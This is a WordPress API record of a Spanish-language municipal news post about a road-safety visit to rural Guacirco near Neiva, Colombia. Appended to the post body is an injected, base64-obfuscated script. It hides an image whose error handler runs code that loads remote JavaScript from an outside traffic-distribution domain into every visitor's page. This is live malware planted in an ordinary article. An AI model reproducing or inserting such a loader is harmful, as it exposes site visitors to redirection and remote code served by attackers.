{"id":13149,"date":"2025-08-01T08:45:32","date_gmt":"2025-08-01T13:45:32","guid":{"rendered":"https:\/\/radiosurcolombiana.com\/wp\/?p=13149"},"modified":"2025-08-25T12:19:15","modified_gmt":"2025-08-25T17:19:15","slug":"alcaldia-ejecuto-visita-tecnica-de-seguridad-vial-en-guacirco","status":"publish","type":"post","link":"https:\/\/radiosurcolombiana.com\/wp\/alcaldia-ejecuto-visita-tecnica-de-seguridad-vial-en-guacirco\/","title":{"rendered":"ALCALD\u00cdA EJECUT\u00d3 VISITA TECNICA DE SEGURIDAD VIAL EN GUACIRCO"},"content":{"rendered":"\n<p>Con el \u00e1nimo de mejorar la movilidad y reducir la siniestralidad en zona rural, la Secretar\u00eda de Movilidad recorri\u00f3 el centro poblado de Guacirco y sus veredas. El trabajo de campo plasm\u00f3 compromisos en materia de se\u00f1alizaci\u00f3n vial y procesos de educaci\u00f3n vial con ni\u00f1os, ni\u00f1as, adolescentes y comunidad en general.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-1-1-768x1024.jpg\" alt=\"\" class=\"wp-image-13152\" srcset=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-1-1-768x1024.jpg 768w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-1-1-225x300.jpg 225w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-1-1-1152x1536.jpg 1152w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-1-1.jpg 1536w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>El corregimiento de Guacirco iniciar\u00e1 en el mes de septiembre un cronograma de actividades enmarcadas en la seguridad en las v\u00edas. Despu\u00e9s de una visita en campo, el equipo t\u00e9cnico de la secretar\u00eda logro reconocer las necesidades m\u00e1s sentidas de la comunidad y priorizar acciones que ser\u00e1n ejecutadas a corto plazo.<\/p>\n\n\n\n<p>Dentro de los compromisos, qued\u00f3 pactada la intervenci\u00f3n y el acompa\u00f1amiento del equipo de educaci\u00f3n vial, para reforzar conocimientos en las normas de tr\u00e1nsito, as\u00ed como tambi\u00e9n en las conductas seguras que deben adoptarse en la v\u00eda.<\/p>\n\n\n\n<p>Asimismo, se ejecutar\u00e1n trabajos t\u00e9cnicos en se\u00f1alizaci\u00f3n vial, tanto horizontal como vertical, en tramos de alto flujo vehicular y peatonal, como sedes de instituciones educativas y puestos de salud.<\/p>\n\n\n\n<p>Tambi\u00e9n se har\u00e1n zonas de tr\u00e1fico calmado para reducir la velocidad en zonas en las que son recurrentes los siniestros viales. Todo lo anterior, con el prop\u00f3sito de que menos personas pierdan la vida a causa de siniestros viales.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"13151\" src=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-2-1-1024x768.jpg\" alt=\"\" class=\"wp-image-13151\" srcset=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-2-1-1024x768.jpg 1024w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-2-1-300x225.jpg 300w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-2-1-768x576.jpg 768w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-2-1-1536x1152.jpg 1536w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-2-1.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"13150\" src=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-3-1-1024x768.jpg\" alt=\"\" class=\"wp-image-13150\" srcset=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-3-1-1024x768.jpg 1024w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-3-1-300x225.jpg 300w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-3-1-768x576.jpg 768w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-3-1-1536x1152.jpg 1536w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/08\/1-ago-3-1.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u201cNos interesa el sector rural, por eso hoy tuvimos la oportunidad de visitar veredas como San Francisco, Pe\u00f1as Blancas, Tamarindo, Buziraco, las cuales han expresado su necesidad de fortalecer procesos de se\u00f1alizaci\u00f3n horizontal, vertical, demarcaci\u00f3n de zonas escolares y zonas de tr\u00e1fico calmado con el prop\u00f3sito de tambi\u00e9n, desde la zona rural, prevenir la siniestralidad\u201d, sostuvo Edna Johanna Cruz, secretaria de Movilidad en el desarrollo de la visita.<\/p>\n\n\n\n<p>El trabajo con la comunidad y sus lideres, permitir\u00e1 que sigan llegando soluciones puntuales a todo el Municipio, dando cumplimiento a la estrategia de Gobierno en Acci\u00f3n 2.0 que se lidera desde la Administraci\u00f3n Municipal en cabeza del ingeniero Germ\u00e1n Casagua, alcalde de Neiva.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con el \u00e1nimo de mejorar la movilidad y reducir la siniestralidad en zona rural, la Secretar\u00eda de Movilidad recorri\u00f3 el centro poblado de Guacirco y sus veredas. El trabajo de&hellip; <\/p>\n","protected":false},"author":2,"featured_media":13150,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_joinchat":[],"footnotes":""},"categories":[3,18],"tags":[],"class_list":["post-13149","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-comunidad","category-ciudad"],"_links":{"self":[{"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/posts\/13149","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/comments?post=13149"}],"version-history":[{"count":2,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/posts\/13149\/revisions"}],"predecessor-version":[{"id":13231,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/posts\/13149\/revisions\/13231"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/media\/13150"}],"wp:attachment":[{"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/media?parent=13149"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/categories?post=13149"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/tags?post=13149"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}